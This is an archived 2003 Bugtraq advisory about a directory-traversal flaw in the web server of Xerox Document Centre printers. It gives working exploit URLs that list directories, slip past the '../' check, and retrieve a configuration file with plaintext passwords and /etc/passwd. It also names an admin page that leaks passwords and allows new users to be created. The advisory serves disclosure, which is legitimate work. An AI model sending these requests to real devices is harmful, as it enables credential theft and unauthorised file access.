lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20031219141657.A1147@shiva.cps.unizar.es>
Date: Fri, 19 Dec 2003 14:16:57 +0100
From: "J.A. Gutierrez" <spd@...va.cps.unizar.es>
To: bugtraq@...urityfocus.com
Subject: Security bug in Xerox Document Centre




CONTACT INFORMATION
===============================================================================

 Name                   : J.A. Gutierrez
 E-mail                 : spd@...va.cps.unizar.es


 Reported this to the vendor on Mon Dec 15 2003 using feedback form
 at http://www.xerox.com, since I couldn't find a security contact.


TECHNICAL INFO
===============================================================================

Vulnerable systems
- --------------------------------------------------------------

    Xerox Document Centre 470, 255ST and maybe others.
    Software        : Xerox_MicroServer
    Version         : Xerox11 0.19.5.509
    OS              : LynxOS:E2.1_SMP.063.1:02/13/2003


Impact
- -----------------------------------------


    Remote access to files.
    Access to plaintext passwords for the http administration interface.
    Access to DES passwords for the operating system.
    Read-write access to http users and passwords


Details
- --------------------------------------------------------------

    Web server software (self-reports as "Xerox_MicroServer/Xerox11")
    for Xerox hardware will return a binary dump of directories when
    the requested URL ends with "/.." or "/."; so you can build easily
    the directory/file tree from document root and get every file.

    At first, you can't get back past document root, since httpd seems
    to reject "../" if it would climb back too much:


    GET /../.. -> "The request had invalid syntax."

    But it does accept "../":

    GET /assist/.. -> OK

    So maybe it just counts "../" groups and compares the count
    to the total number of "/" ? Let's try:

    GET /assist/////.././../../. -> OK



    Examples:

    - http://xerox_dc_470.example.com/..


00    00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43     ...E...........C
10    00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06     ...........F....
20    63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06     config.....H....
30    68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04     htdocs.....&....
40    6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04     jobs.......)....
50    6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00     lang............
60    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................

    - http://xerox_dc_470.example.com////../../data/config/microsrv.cfg

    and you get full configuration, including plain text passwords.

    - http://xerox_dc_470.example.com////////../../../../../../etc/passwd

    and you get a passwd file to run crack on


    Even without having to use ".." you can get the plain text passwords
    for the HTTP interface using

    http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml

    From that page, you can even create new users; when you press
    "Apply new settings" button prompts for admin password (the
    same you just have read in that same page)


    Probably you could use this to steal documents from the printer
    queue, but I haven't verified this.


    Note: to test this vulnerability do not use any "smart" http client
    which will rewrite the URL internally to suppress '../' parts.



Workaround
- ---------------------------------------------------------------------

    - Disable http interface.
    - Restrict access permissions to trusted hosts

===============================================================================


-- 
finger spd@...va.cps.unizar.es for PGP      /
.mailcap tip of the day:                   /             La vida es una carcel
application/ms-tnef; cat '%s' > /dev/null /           con las puertas abiertas
text/x-vcard; cat '%s' > /dev/null       /            (A. Calamaro)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ